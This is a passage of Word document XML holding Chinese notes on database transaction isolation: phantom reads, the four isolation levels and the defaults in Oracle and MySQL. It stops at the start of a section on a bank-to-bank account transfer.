      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> T1, T2, T1 </w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从一个表中读取了一个字段</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> T2 </w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在该表中插入了一些新的行</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> T1 </w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再次读取同一个表</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就会多出几行</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C37A6" w:rsidRPr="002C37A6" w:rsidRDefault="002C37A6" w:rsidP="002C37A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库事务的隔离性</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库系统必须具有隔离</w:t>
      </w:r>
      <w:r w:rsidRPr="00415833">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>并发运行各个事务的能力</w:t>
      </w:r>
      <w:r w:rsidRPr="00415833">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使它们不会相互影响</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>避免各种并发问题</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C37A6" w:rsidRPr="002C37A6" w:rsidRDefault="002C37A6" w:rsidP="002C37A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020508B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>一个事务与其他事务隔离的程度称为隔离级别</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库规定了多种事务隔离级别</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不同隔离级别对应不同的干扰程度</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13E97">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>隔离级别越高</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13E97">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13E97">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>数据一致性就越好</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13E97">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13E97">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>但并发性越弱</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C37A6" w:rsidRPr="002C37A6" w:rsidRDefault="002C37A6" w:rsidP="002C37A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库提供了</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中隔离级别：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C37A6" w:rsidRPr="002C37A6" w:rsidRDefault="002C37A6" w:rsidP="002C37A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>隔离级别</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C37A6" w:rsidRPr="002C37A6" w:rsidRDefault="00D25BB5" w:rsidP="002C37A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r w:rsidR="002C37A6" w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>READ UNCOMMITTED(</w:t>
      </w:r>
      <w:r w:rsidR="002C37A6" w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读未提交数据</w:t>
      </w:r>
      <w:r w:rsidR="002C37A6" w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="002C37A6" w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="002C37A6" w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许事务读取未被其他事务提交的变更，脏读、不可重复读和幻读的问题都会出现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C37A6" w:rsidRPr="002C37A6" w:rsidRDefault="00D25BB5" w:rsidP="002C37A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r w:rsidR="002C37A6" w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>READ COMMITED(</w:t>
      </w:r>
      <w:r w:rsidR="002C37A6" w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读已提交数据</w:t>
      </w:r>
      <w:r w:rsidR="002C37A6" w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="002C37A6" w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="002C37A6" w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只允许事务读取已经被其他事务提交的变更，可以避免脏读，但不可重复读和幻读问题仍然会出现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C37A6" w:rsidRPr="002C37A6" w:rsidRDefault="00D25BB5" w:rsidP="002C37A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(3)</w:t>
      </w:r>
      <w:r w:rsidR="002C37A6" w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>REPEATABLE READ(</w:t>
      </w:r>
      <w:r w:rsidR="002C37A6" w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可重复读</w:t>
      </w:r>
      <w:r w:rsidR="002C37A6" w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="002C37A6" w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="002C37A6" w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确保事务可以多次从一个字段中读取相同的值，在这个事务持续期间，禁止其他事务对这个字段进行更新，可以避免脏读和不可重复读，但幻读的问题依然存在</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C37A6" w:rsidRPr="002C37A6" w:rsidRDefault="00D25BB5" w:rsidP="002C37A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(4)</w:t>
      </w:r>
      <w:r w:rsidR="002C37A6" w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SERIALIZABLE(</w:t>
      </w:r>
      <w:r w:rsidR="002C37A6" w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>串行化</w:t>
      </w:r>
      <w:r w:rsidR="002C37A6" w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="002C37A6" w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="002C37A6" w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确保事务可以从一个表中读取相同的行，在这个事务持续期间，禁止其他事务对该表执行插入、更新和删除操作，所有并发问题都可以避免，但性能十分低</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C37A6" w:rsidRPr="002C37A6" w:rsidRDefault="002C37A6" w:rsidP="002C37A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Oracle </w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持的</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>种事务隔离级别：</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">READ COMMITED, SERIALIZABLE. Oracle </w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认的事务隔离级别为</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: READ COMMITED </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E7355" w:rsidRPr="00DD51AA" w:rsidRDefault="002C37A6" w:rsidP="002C37A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Mysql </w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中事务隔离级别</w:t>
      </w:r>
      <w:r w:rsidRPr="002C37A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D25BB5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Mysql </w:t>
      </w:r>
      <w:r w:rsidRPr="00D25BB5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>默认的事务隔离级别为</w:t>
      </w:r>
      <w:r w:rsidRPr="00D25BB5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>: REPEATABLE READ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E7355" w:rsidRPr="00F41A4C" w:rsidRDefault="004E7355" w:rsidP="004E7355">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3.5</w:t>
      </w:r>
      <w:r w:rsidR="008B412C" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0088099B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="0088099B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>银行</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>账户</w:t>
      </w:r>
      <w:r w:rsidR="0088099B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>向</w:t>
      </w:r>
      <w:r w:rsidR="0088099B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="0088099B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>银行</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>账户转账</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E7355" w:rsidRPr="00F41A4C" w:rsidRDefault="004E7355" w:rsidP="004E7355">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004E7355" w:rsidRPr="00F41A4C" w:rsidRDefault="004E7355" w:rsidP="004E7355">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004E7355" w:rsidRPr="00F41A4C" w:rsidRDefault="004E7355" w:rsidP="004E7355">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>银行</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>账户</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>银行</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
